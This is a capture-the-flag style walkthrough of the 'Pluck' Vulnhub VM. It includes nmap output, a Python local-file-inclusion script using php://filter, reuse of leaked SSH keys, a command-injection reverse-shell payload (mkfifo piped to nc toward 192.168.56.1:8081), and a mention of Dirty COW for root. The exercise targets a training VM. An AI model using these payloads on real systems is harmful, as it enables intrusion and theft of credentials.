Pluck – Boot2Root – Walkthrough

Introduction

« Pluck » is a new « boot2root » VM-style. You just need to launch the VM and .. get root ! Note that you can find this VM on Vulnhub.

Discovery

Scan all the ports !

$ sudo nmap -p- 192.168.56.101

Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-20 14:14 CET
Nmap scan report for 192.168.56.101
Host is up (0.00056s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
5355/tcp open  unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)

$ sudo nmap -p22,80,3306,5355 192.168.56.101 -A 

Starting Nmap 7.01 ( https://nmap.org ) at 2017-03-20 14:14 CET
Nmap scan report for 192.168.56.101
Host is up (0.00018s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e8:87:ba:3e:d7:43:23:bf:4a:6b:9d:ae:63:14:ea:71 (RSA)
|_  256 8f:8c:ac:8d:e8:cc:f9:0e:89:f7:5d:a0:6c:28:56:fd (ECDSA)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Pluck
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  unknown
MAC Address: 08:00:27:45:29:54 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.18 ms 192.168.56.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.55 seconds

 

Gaining access

Let’s have a look at the HTTP service.

Oh, "?page=about.php" ? Why not trying a local file inclusion ? With something like.../etc/passwd ?

It works ! For mor visibility (and fun), we can exploit the LFI with a simple python script, that'll use the php wrappers "filter" to encode the output in base64 (output is decoded).

#!/usr/bin/python
# -*- coding: utf-8 -*-

import requests
import re,base64

url = "http://192.168.56.101/index.php?page=php://filter/read=convert.base64-encode/resource="
file_lfi = "/etc/passwd"

fullurl = url+file_lfi

req = requests.get(fullurl)

res = re.findall('<div class=jumbotron>(.*)</div><br>', req.text.encode('utf-8'))
output = base64.b64decode(res[0])
print output

# # Write command
# f = open('backup.tar','w')
# f.write(output)
exploiting_lfi
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh
/etc/passwd output

We can see something unusual at the end of the file : "backups easier,,,:/backups:/usr/local/scripts/backup.sh". To get the content of the file, just modify the "file_lfi" variable in the script :

#!/bin/bash

########################
# Server Backup script #
########################

#Backup directories in /backups so we can get it via tftp

echo "Backing up data"
tar -cf /backups/backup.tar /home /var/www/html > /dev/null 2& > /dev/null
echo "Backup complete"

Two directories (/home and /var/www/html) are backing up in the file /backups/backup.tar. Let's grab it (uncomment the last lines in the python script to write it where you want).

$ file backup.tar 
backup.tar: POSIX tar archive (GNU)

$ tar tvf backup.tar
drwxr-xr-x root/root         0 2017-01-18 09:27 home/
drwxr-xr-x bob/bob           0 2017-01-18 13:43 home/bob/
-rw-r--r-- bob/bob        3771 2017-01-18 06:39 home/bob/.bashrc
-rw-r--r-- bob/bob           0 2017-01-18 09:40 home/bob/.sudo_as_admin_successful
-rw-r--r-- bob/bob         655 2017-01-18 06:39 home/bob/.profile
-rw-r--r-- bob/bob         220 2017-01-18 06:39 home/bob/.bash_logout
drwxr-xr-x paul/paul         0 2017-01-18 19:13 home/paul/
drwxrwxr-x paul/paul         0 2017-01-18 19:09 home/paul/keys/
-rwxrwxr-x paul/paul       600 2017-01-18 19:08 home/paul/keys/id_key3.pub
-rwxrwxr-x paul/paul       600 2017-01-18 19:08 home/paul/keys/id_key2.pub
-rwxrwxr-x paul/paul       672 2017-01-18 19:08 home/paul/keys/id_key2
-rwxrwxr-x paul/paul       392 2017-01-18 19:09 home/paul/keys/id_key4.pub
-rwxrwxr-x paul/paul       600 2017-01-18 19:08 home/paul/keys/id_key5.pub
-rwxrwxr-x paul/paul      1675 2017-01-18 19:09 home/paul/keys/id_key6
-rwxrwxr-x paul/paul       668 2017-01-18 19:08 home/paul/keys/id_key1
-rwxrwxr-x paul/paul       668 2017-01-18 19:08 home/paul/keys/id_key5
-rwxrwxr-x paul/paul       600 2017-01-18 19:08 home/paul/keys/id_key1.pub
-rwxrwxr-x paul/paul       392 2017-01-18 19:09 home/paul/keys/id_key6.pub
-rwxrwxr-x paul/paul      1679 2017-01-18 19:09 home/paul/keys/id_key4
-rwxrwxr-x paul/paul       668 2017-01-18 19:08 home/paul/keys/id_key3
-rw-r--r-- paul/paul      3771 2017-01-18 09:04 home/paul/.bashrc
-rw-r--r-- paul/paul       655 2017-01-18 09:04 home/paul/.profile
-rw-r--r-- paul/paul       220 2017-01-18 09:04 home/paul/.bash_logout
drwxr-xr-x peter/peter       0 2017-01-18 09:04 home/peter/
-rw-r--r-- peter/peter    3771 2017-01-18 09:04 home/peter/.bashrc
-rw-r--r-- peter/peter     655 2017-01-18 09:04 home/peter/.profile
-rw-r--r-- peter/peter     220 2017-01-18 09:04 home/peter/.bash_logout
drwxr-xr-x root/root         0 2017-01-18 19:28 var/www/html/
drwxr-xr-x root/root         0 2016-07-25 15:53 var/www/html/fonts/
-rw-r--r-- root/root    108738 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.svg
-rw-r--r-- root/root     18028 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.woff2
-rw-r--r-- root/root     45404 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.ttf
-rw-r--r-- root/root     23424 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.woff
-rw-r--r-- root/root     20127 2016-07-25 13:43 var/www/html/fonts/glyphicons-halflings-regular.eot
-rw-r--r-- root/root       589 2017-01-18 18:16 var/www/html/about.php
-rw-r--r-- root/root      1427 2017-01-18 19:28 var/www/html/index.php
-rw-r--r-- root/root       241 2017-01-18 16:10 var/www/html/footer.php
drwxr-xr-x root/root         0 2016-07-25 15:53 var/www/html/css/
-rw-r--r-- root/root    389287 2016-07-25 15:53 var/www/html/css/bootstrap.css.map
-rw-r--r-- root/root    542194 2016-07-25 15:53 var/www/html/css/bootstrap.min.css.map
-rw-r--r-- root/root     26132 2016-07-25 15:53 var/www/html/css/bootstrap-theme.css
-rw-r--r-- root/root     23409 2016-07-25 15:53 var/www/html/css/bootstrap-theme.min.css
-rw-r--r-- root/root    121200 2016-07-25 15:53 var/www/html/css/bootstrap.min.css
-rw-r--r-- root/root     25648 2016-07-25 15:53 var/www/html/css/bootstrap-theme.min.css.map
-rw-r--r-- root/root     47706 2016-07-25 15:53 var/www/html/css/bootstrap-theme.css.map
-rw-r--r-- root/root    146010 2016-07-25 15:53 var/www/html/css/bootstrap.css
-rw-r--r-- root/root      1492 2017-01-18 17:09 var/www/html/header.php
-rw-r--r-- root/root      1486 2017-01-18 18:24 var/www/html/admin.php
drwxr-xr-x root/root         0 2017-01-18 16:08 var/www/html/js/
-rw-r--r-- root/root     97163 2016-12-20 19:17 var/www/html/js/jquery.min.js
-rw-r--r-- root/root     69707 2016-07-25 15:53 var/www/html/js/bootstrap.js
-rw-r--r-- root/root       484 2016-07-25 15:53 var/www/html/js/npm.js
-rw-r--r-- root/root     37045 2016-07-25 15:53 var/www/html/js/bootstrap.min.js

Wow, many id_key ! And a SSH Server is up 🙂 Trying all the key, only the id_key4 seems to work !

$ ssh paul@192.168.56.101 -i id_key4
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0755 for 'id_key4' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_key4": bad permissions
paul@192.168.56.101's password: 
ssh_key_failed_permissions

Oops, bad perms ! Fix it !

chmod 600 id_key*

W00t ! Connected .... but stuck in a pdmenu :/

Escape PDMENU / Reverse shell access

With this menu, we can list/browse directory, modify files (if we have permissions, of course), navigate with lynx, ping or etablish a telnet connexion. Every time I see a prompt that allow a ping command, I think "Command Injection" :-). Here we go :

1;`id`
Payload - test

Reverse shell time ! Set up a listener on port 8081, and inject the following payload :

1;`mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.1 8081 >/tmp/f`
reverse-shell-payload

Gaining root access / Privilege escalation

How to get root ? What's the kernel ? What's the OS ?

$ uname -a
Linux pluck 4.8.0-22-generic #24-Ubuntu SMP Sat Oct 8 09:15:00 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release*
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.10
DISTRIB_CODENAME=yakkety
DISTRIB_DESCRIPTION="Ubuntu 16.10"
NAME="Ubuntu"
VERSION="16.10 (Yakkety Yak)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.10"
VERSION_ID="16.10"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="http://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=yakkety
UBUNTU_CODENAME=yakkety
Information Gathering - Kernel/OS

What about Dirtyc0w ?

Patched Kernel Versions
Ubuntu
4.8.0-26.28 for Ubuntu 16.10
4.4.0-45.66 for Ubuntu 16.04 LTS
3.13.0-100.147 for Ubuntu 14.04 LTS
3.2.0-113.155 for Ubuntu 12.04 LTS

Pluck seems to be vulnerable ! Exploit !

Got root 😉

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Captcha *